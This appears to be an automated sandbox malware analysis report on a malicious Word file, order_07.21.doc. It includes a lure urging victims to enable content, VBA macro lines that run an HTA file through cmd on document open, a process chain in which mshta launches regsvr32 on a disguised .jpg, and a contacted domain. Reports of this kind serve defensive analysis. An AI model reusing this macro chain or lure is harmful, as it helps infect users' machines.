Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://webshell.suite.office.com
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://wus2.contentsync.
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: CBF1CA16-CFEE-4693-AD36-1F153D41DA8A.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" Page1 of 2 150 words It? O
Source: Screenshot number: 4Screenshot OCR: Enable content" Page1 of 2 150 words It? O Type here to search m % - I + lOW, Ki E a a g "g "
Source: Document image extraction number: 0Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 0Screenshot OCR: Enable content"
Source: Document image extraction number: 1Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 1Screenshot OCR: Enable content"
Source: Screenshot number: 8Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" Page1 of 2 150 words It? O
Source: Screenshot number: 8Screenshot OCR: Enable content" Page1 of 2 150 words It? O Type here to search m % - I + 100% Ki E a a g wg s
Source: Screenshot number: 12Screenshot OCR: Enable editing" button Verdana - 1 - a" A" 4 At" on the top bar, and then click "Enable content" ,
Source: Screenshot number: 12Screenshot OCR: Enable content" ,_ ,_ B I u "y " a " = " := " Styles 150 words It? O Type here to search m % - I
Document contains an embedded VBA macro which may execute processesShow sources
Source: order_07.21.docOLE, VBA macro line: arrayObjectButt = Shell("cmd /c " & windowLst)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: order_07.21.docOLE, VBA macro line: windowLst = "c:\programdata\captionEx.hta"
Source: order_07.21.docOLE, VBA macro line: Sub document_open()
Source: order_07.21.docOLE indicator, VBA macros: true
Source: order_07.21.docOLE indicator has summary info: false
Source: order_07.21.docOLE indicator application name: unknown
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: classification engineClassification label: mal96.expl.evad.winDOC@9/12@2/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{881B384A-231C-4467-82FF-CA6DC02C69C2} - OProcSessId.datJump to behavior
Source: order_07.21.docOLE document summary: title field not present or empty
Source: order_07.21.docOLE document summary: author field not present or empty
Source: order_07.21.docOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: order_07.21.docVirustotal: Detection: 48%
Source: order_07.21.docReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c c:\programdata\captionEx.hta
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c c:\programdata\captionEx.hta
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Data Obfuscation:

barindex
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_0681129F push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_0681129F push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_068112A6 push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_068112A6 push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_06811254 push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_06811254 push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_0681129F push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_0681129F push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_068112A6 push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_068112A6 push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_06811254 push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_06811254 push esi; ret
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_2_0573FC20 pushad ; iretd
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_2_0573F8CE pushad ; iretd
Source: C:\Windows\SysWOW64\cmd.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: mshta.exe, 00000004.00000002.224559288.000000000AB90000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
Source: mshta.exe, 00000004.00000002.224870248.000000000AFE0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.224471240.0000000002E70000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: mshta.exe, 00000004.00000003.213158117.0000000001060000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\er\
Source: mshta.exe, 00000004.00000002.224559288.000000000AB90000.00000004.00000001.sdmpBinary or memory string: VMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000004.00000002.224870248.000000000AFE0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.224471240.0000000002E70000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: mshta.exe, 00000004.00000002.224870248.000000000AFE0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.224471240.0000000002E70000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 00000004.00000003.213158117.0000000001060000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000004.00000002.224870248.000000000AFE0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.224471240.0000000002E70000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: page read and write | page guard
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22DLL Side-Loading1Process Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution11Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools11LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting22NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 452438 Sample: order_07.21.doc Startdate: 22/07/2021 Architecture: WINDOWS Score: 96 24 Multi AV Scanner detection for domain / URL 2->24 26 Multi AV Scanner detection for submitted file 2->26 28 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->28 30 7 other signatures 2->30 8 WINWORD.EXE 38 41 2->8         started        process3 file4 20 C:\Users\user\AppData\...\order_07.21.doc.LNK, MS 8->20 dropped 11 cmd.exe 2 2 8->11         started        process5 process6 13 mshta.exe 1 27 11->13         started        16 conhost.exe 11->16         started        dnsIp7 22 airloweryd.com 13->22 18 regsvr32.exe 13->18         started        process8

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
order_07.21.doc48%VirustotalBrowse
order_07.21.doc14%MetadefenderBrowse
order_07.21.doc15%ReversingLabsDocument-Office.Trojan.Sadoca

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
airloweryd.com10%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
